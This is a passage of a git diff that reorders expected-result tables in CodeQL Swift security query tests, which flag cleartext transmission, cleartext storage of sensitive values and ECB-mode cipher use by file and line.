a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected @@ -1,35 +1,3 @@ -#select -| testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:150:45:150:45 | password | password | -| testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | testAlamofire.swift:152:51:152:51 | password | testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:152:51:152:51 | password | password | -| testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | testAlamofire.swift:154:38:154:38 | email | testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:154:38:154:38 | email | email | -| testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | This operation transmits 'passwordPlain', which may contain unencrypted sensitive data from $@. | testSend.swift:29:19:29:19 | passwordPlain | passwordPlain | -| testSend.swift:37:19:37:19 | data2 | testSend.swift:33:19:33:19 | passwordPlain | testSend.swift:37:19:37:19 | data2 | This operation transmits 'data2', which may contain unencrypted sensitive data from $@. | testSend.swift:33:19:33:19 | passwordPlain | passwordPlain | -| testSend.swift:65:27:65:27 | str1 | testSend.swift:58:13:58:13 | password | testSend.swift:65:27:65:27 | str1 | This operation transmits 'str1', which may contain unencrypted sensitive data from $@. | testSend.swift:58:13:58:13 | password | password | -| testSend.swift:66:27:66:27 | str2 | testSend.swift:59:13:59:13 | password | testSend.swift:66:27:66:27 | str2 | This operation transmits 'str2', which may contain unencrypted sensitive data from $@. | testSend.swift:59:13:59:13 | password | password | -| testSend.swift:67:27:67:27 | str3 | testSend.swift:60:17:60:17 | password | testSend.swift:67:27:67:27 | str3 | This operation transmits 'str3', which may contain unencrypted sensitive data from $@. | testSend.swift:60:17:60:17 | password | password | -| testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | testSend.swift:71:27:71:27 | license_key | license_key | -| testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | This operation transmits '.mobileNumber', which may contain unencrypted sensitive data from $@. | testSend.swift:72:27:72:30 | .mobileNumber | .mobileNumber | -| testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | This operation transmits '.Telephone', which may contain unencrypted sensitive data from $@. | testSend.swift:76:27:76:30 | .Telephone | .Telephone | -| testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | This operation transmits '.birth_day', which may contain unencrypted sensitive data from $@. | testSend.swift:77:27:77:30 | .birth_day | .birth_day | -| testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | This operation transmits '.CarePlanID', which may contain unencrypted sensitive data from $@. | testSend.swift:78:27:78:30 | .CarePlanID | .CarePlanID | -| testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | This operation transmits '.BankCardNo', which may contain unencrypted sensitive data from $@. | testSend.swift:79:27:79:30 | .BankCardNo | .BankCardNo | -| testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | This operation transmits '.MyCreditRating', which may contain unencrypted sensitive data from $@. | testSend.swift:80:27:80:30 | .MyCreditRating | .MyCreditRating | -| testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | This operation transmits '.OneTimeCode', which may contain unencrypted sensitive data from $@. | testSend.swift:81:27:81:30 | .OneTimeCode | .OneTimeCode | -| testSend.swift:94:27:94:39 | .value | testSend.swift:94:27:94:30 | .password | testSend.swift:94:27:94:39 | .value | This operation transmits '.value', which may contain unencrypted sensitive data from $@. | testSend.swift:94:27:94:30 | .password | .password | -| testURL.swift:39:18:39:50 | ... .+(_:_:) ... | testURL.swift:39:50:39:50 | passwd | testURL.swift:39:18:39:50 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:39:50:39:50 | passwd | passwd | -| testURL.swift:41:18:41:51 | ... .+(_:_:) ... | testURL.swift:41:51:41:51 | account_no | testURL.swift:41:18:41:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:41:51:41:51 | account_no | account_no | -| testURL.swift:42:18:42:51 | ... .+(_:_:) ... | testURL.swift:42:51:42:51 | credit_card_no | testURL.swift:42:18:42:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:42:51:42:51 | credit_card_no | credit_card_no | -| testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | This operation transmits 'passwd', which may contain unencrypted sensitive data from $@. | testURL.swift:46:22:46:22 | passwd | passwd | -| testURL.swift:50:18:50:51 | ... .+(_:_:) ... | testURL.swift:50:51:50:51 | e_mail | testURL.swift:50:18:50:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:50:51:50:51 | e_mail | e_mail | -| testURL.swift:52:18:52:53 | ... .+(_:_:) ... | testURL.swift:52:53:52:53 | a_homeaddr_z | testURL.swift:52:18:52:53 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:52:53:52:53 | a_homeaddr_z | a_homeaddr_z | -| testURL.swift:54:18:54:51 | ... .+(_:_:) ... | testURL.swift:54:51:54:51 | resident_ID | testURL.swift:54:18:54:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:54:51:54:51 | resident_ID | resident_ID | -| testURL.swift:73:18:73:67 | ... .+(_:_:) ... | testURL.swift:73:52:73:67 | call to get_secret_key() | testURL.swift:73:18:73:67 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:73:52:73:67 | call to get_secret_key() | call to get_secret_key() | -| testURL.swift:75:18:75:69 | ... .+(_:_:) ... | testURL.swift:75:53:75:69 | call to get_cert_string() | testURL.swift:75:18:75:69 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:75:53:75:69 | call to get_cert_string() | call to get_cert_string() | -| testURL.swift:96:18:96:18 | "..." | testURL.swift:96:51:96:51 | certificate | testURL.swift:96:18:96:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:96:51:96:51 | certificate | certificate | -| testURL.swift:106:20:106:20 | "..." | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | testURL.swift:106:20:106:20 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | call to SecKeyCopyExternalRepresentation(_:_:) | -| testURL.swift:116:18:116:18 | "..." | testURL.swift:116:52:116:52 | email | testURL.swift:116:18:116:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:116:52:116:52 | email | email | -| testURL.swift:123:18:123:18 | "..." | testURL.swift:123:52:123:52 | phone_number | testURL.swift:123:18:123:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:123:52:123:52 | phone_number | phone_number | -| testURL.swift:132:18:132:18 | "..." | testURL.swift:132:39:132:39 | account_no | testURL.swift:132:18:132:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:132:39:132:39 | account_no | account_no | edges | file://:0:0:0:0 | self | file://:0:0:0:0 | .value | provenance | Config | | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | provenance | | @@ -135,3 +103,35 @@ nodes subpaths | testSend.swift:60:17:60:17 | password | testSend.swift:41:10:41:18 | data | testSend.swift:41:45:41:45 | data | testSend.swift:60:13:60:25 | call to pad(_:) | | testSend.swift:94:27:94:30 | .password | testSend.swift:86:7:86:7 | self | file://:0:0:0:0 | .value | testSend.swift:94:27:94:39 | .value | +#select +| testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:150:45:150:45 | password | password | +| testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | testAlamofire.swift:152:51:152:51 | password | testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:152:51:152:51 | password | password | +| testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | testAlamofire.swift:154:38:154:38 | email | testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:154:38:154:38 | email | email | +| testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | This operation transmits 'passwordPlain', which may contain unencrypted sensitive data from $@. | testSend.swift:29:19:29:19 | passwordPlain | passwordPlain | +| testSend.swift:37:19:37:19 | data2 | testSend.swift:33:19:33:19 | passwordPlain | testSend.swift:37:19:37:19 | data2 | This operation transmits 'data2', which may contain unencrypted sensitive data from $@. | testSend.swift:33:19:33:19 | passwordPlain | passwordPlain | +| testSend.swift:65:27:65:27 | str1 | testSend.swift:58:13:58:13 | password | testSend.swift:65:27:65:27 | str1 | This operation transmits 'str1', which may contain unencrypted sensitive data from $@. | testSend.swift:58:13:58:13 | password | password | +| testSend.swift:66:27:66:27 | str2 | testSend.swift:59:13:59:13 | password | testSend.swift:66:27:66:27 | str2 | This operation transmits 'str2', which may contain unencrypted sensitive data from $@. | testSend.swift:59:13:59:13 | password | password | +| testSend.swift:67:27:67:27 | str3 | testSend.swift:60:17:60:17 | password | testSend.swift:67:27:67:27 | str3 | This operation transmits 'str3', which may contain unencrypted sensitive data from $@. | testSend.swift:60:17:60:17 | password | password | +| testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | testSend.swift:71:27:71:27 | license_key | license_key | +| testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | This operation transmits '.mobileNumber', which may contain unencrypted sensitive data from $@. | testSend.swift:72:27:72:30 | .mobileNumber | .mobileNumber | +| testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | This operation transmits '.Telephone', which may contain unencrypted sensitive data from $@. | testSend.swift:76:27:76:30 | .Telephone | .Telephone | +| testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | This operation transmits '.birth_day', which may contain unencrypted sensitive data from $@. | testSend.swift:77:27:77:30 | .birth_day | .birth_day | +| testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | This operation transmits '.CarePlanID', which may contain unencrypted sensitive data from $@. | testSend.swift:78:27:78:30 | .CarePlanID | .CarePlanID | +| testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | This operation transmits '.BankCardNo', which may contain unencrypted sensitive data from $@. | testSend.swift:79:27:79:30 | .BankCardNo | .BankCardNo | +| testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | This operation transmits '.MyCreditRating', which may contain unencrypted sensitive data from $@. | testSend.swift:80:27:80:30 | .MyCreditRating | .MyCreditRating | +| testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | This operation transmits '.OneTimeCode', which may contain unencrypted sensitive data from $@. | testSend.swift:81:27:81:30 | .OneTimeCode | .OneTimeCode | +| testSend.swift:94:27:94:39 | .value | testSend.swift:94:27:94:30 | .password | testSend.swift:94:27:94:39 | .value | This operation transmits '.value', which may contain unencrypted sensitive data from $@. | testSend.swift:94:27:94:30 | .password | .password | +| testURL.swift:39:18:39:50 | ... .+(_:_:) ... | testURL.swift:39:50:39:50 | passwd | testURL.swift:39:18:39:50 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:39:50:39:50 | passwd | passwd | +| testURL.swift:41:18:41:51 | ... .+(_:_:) ... | testURL.swift:41:51:41:51 | account_no | testURL.swift:41:18:41:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:41:51:41:51 | account_no | account_no | +| testURL.swift:42:18:42:51 | ... .+(_:_:) ... | testURL.swift:42:51:42:51 | credit_card_no | testURL.swift:42:18:42:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:42:51:42:51 | credit_card_no | credit_card_no | +| testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | This operation transmits 'passwd', which may contain unencrypted sensitive data from $@. | testURL.swift:46:22:46:22 | passwd | passwd | +| testURL.swift:50:18:50:51 | ... .+(_:_:) ... | testURL.swift:50:51:50:51 | e_mail | testURL.swift:50:18:50:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:50:51:50:51 | e_mail | e_mail | +| testURL.swift:52:18:52:53 | ... .+(_:_:) ... | testURL.swift:52:53:52:53 | a_homeaddr_z | testURL.swift:52:18:52:53 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:52:53:52:53 | a_homeaddr_z | a_homeaddr_z | +| testURL.swift:54:18:54:51 | ... .+(_:_:) ... | testURL.swift:54:51:54:51 | resident_ID | testURL.swift:54:18:54:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:54:51:54:51 | resident_ID | resident_ID | +| testURL.swift:73:18:73:67 | ... .+(_:_:) ... | testURL.swift:73:52:73:67 | call to get_secret_key() | testURL.swift:73:18:73:67 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:73:52:73:67 | call to get_secret_key() | call to get_secret_key() | +| testURL.swift:75:18:75:69 | ... .+(_:_:) ... | testURL.swift:75:53:75:69 | call to get_cert_string() | testURL.swift:75:18:75:69 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:75:53:75:69 | call to get_cert_string() | call to get_cert_string() | +| testURL.swift:96:18:96:18 | "..." | testURL.swift:96:51:96:51 | certificate | testURL.swift:96:18:96:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:96:51:96:51 | certificate | certificate | +| testURL.swift:106:20:106:20 | "..." | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | testURL.swift:106:20:106:20 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | call to SecKeyCopyExternalRepresentation(_:_:) | +| testURL.swift:116:18:116:18 | "..." | testURL.swift:116:52:116:52 | email | testURL.swift:116:18:116:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:116:52:116:52 | email | email | +| testURL.swift:123:18:123:18 | "..." | testURL.swift:123:52:123:52 | phone_number | testURL.swift:123:18:123:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:123:52:123:52 | phone_number | phone_number | +| testURL.swift:132:18:132:18 | "..." | testURL.swift:132:39:132:39 | account_no | testURL.swift:132:18:132:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:132:39:132:39 | account_no | account_no | diff --git a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected index 9c412f25ceeb..c3ed50e498cb 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected +++ b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected @@ -1,19 +1,3 @@ -#select -| testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | This operation stores 'password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | password | -| testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | x | -| testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | call to getPassword() | -| testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | This operation stores '.password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | .password | -| testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | passwd | -| testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | passwd | -| testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | This operation stores 'z' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | passwd | -| testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | This operation stores 'password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:28:15:28:15 | password | password | -| testUserDefaults.swift:42:28:42:28 | x | testUserDefaults.swift:41:24:41:24 | x | testUserDefaults.swift:42:28:42:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:41:24:41:24 | x | x | -| testUserDefaults.swift:45:28:45:28 | y | testUserDefaults.swift:44:10:44:22 | call to getPassword() | testUserDefaults.swift:45:28:45:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:44:10:44:22 | call to getPassword() | call to getPassword() | -| testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | This operation stores '.password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:49:28:49:30 | .password | .password | -| testUserDefaults.swift:59:28:59:28 | x | testUserDefaults.swift:55:10:55:10 | passwd | testUserDefaults.swift:59:28:59:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:55:10:55:10 | passwd | passwd | -| testUserDefaults.swift:60:28:60:28 | y | testUserDefaults.swift:56:10:56:10 | passwd | testUserDefaults.swift:60:28:60:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:56:10:56:10 | passwd | passwd | -| testUserDefaults.swift:61:28:61:28 | z | testUserDefaults.swift:57:10:57:10 | passwd | testUserDefaults.swift:61:28:61:28 | z | This operation stores 'z' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:57:10:57:10 | passwd | passwd | -| testUserDefaults.swift:82:28:82:40 | .value | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:82:28:82:40 | .value | This operation stores '.value' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:82:28:82:31 | .password | .password | edges | file://:0:0:0:0 | self | file://:0:0:0:0 | .value | provenance | Config | | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | provenance | | @@ -61,3 +45,19 @@ nodes | testUserDefaults.swift:82:28:82:40 | .value | semmle.label | .value | subpaths | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:74:7:74:7 | self | file://:0:0:0:0 | .value | testUserDefaults.swift:82:28:82:40 | .value | +#select +| testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | This operation stores 'password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | password | +| testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | x | +| testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | call to getPassword() | +| testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | This operation stores '.password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | .password | +| testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | passwd | +| testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | passwd | +| testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | This operation stores 'z' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | passwd | +| testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | This operation stores 'password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:28:15:28:15 | password | password | +| testUserDefaults.swift:42:28:42:28 | x | testUserDefaults.swift:41:24:41:24 | x | testUserDefaults.swift:42:28:42:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:41:24:41:24 | x | x | +| testUserDefaults.swift:45:28:45:28 | y | testUserDefaults.swift:44:10:44:22 | call to getPassword() | testUserDefaults.swift:45:28:45:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:44:10:44:22 | call to getPassword() | call to getPassword() | +| testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | This operation stores '.password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:49:28:49:30 | .password | .password | +| testUserDefaults.swift:59:28:59:28 | x | testUserDefaults.swift:55:10:55:10 | passwd | testUserDefaults.swift:59:28:59:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:55:10:55:10 | passwd | passwd | +| testUserDefaults.swift:60:28:60:28 | y | testUserDefaults.swift:56:10:56:10 | passwd | testUserDefaults.swift:60:28:60:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:56:10:56:10 | passwd | passwd | +| testUserDefaults.swift:61:28:61:28 | z | testUserDefaults.swift:57:10:57:10 | passwd | testUserDefaults.swift:61:28:61:28 | z | This operation stores 'z' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:57:10:57:10 | passwd | passwd | +| testUserDefaults.swift:82:28:82:40 | .value | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:82:28:82:40 | .value | This operation stores '.value' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:82:28:82:31 | .password | .password | diff --git a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected index e1dcb0bbd955..32c4082abb92 100644 --- a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected +++ b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected @@ -1,13 +1,3 @@ -#select -| test.swift:56:37:56:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:56:37:56:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:57:37:57:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:57:37:57:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:58:37:58:41 | call to ECB.init() | call to ECB.init() | -| test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:59:37:59:41 | call to ECB.init() | call to ECB.init() | -| test.swift:60:37:60:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | -| test.swift:61:37:61:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | -| test.swift:71:42:71:42 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:71:42:71:42 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:72:42:72:46 | call to ECB.init() | call to ECB.init() | -| test.swift:73:42:73:58 | call to 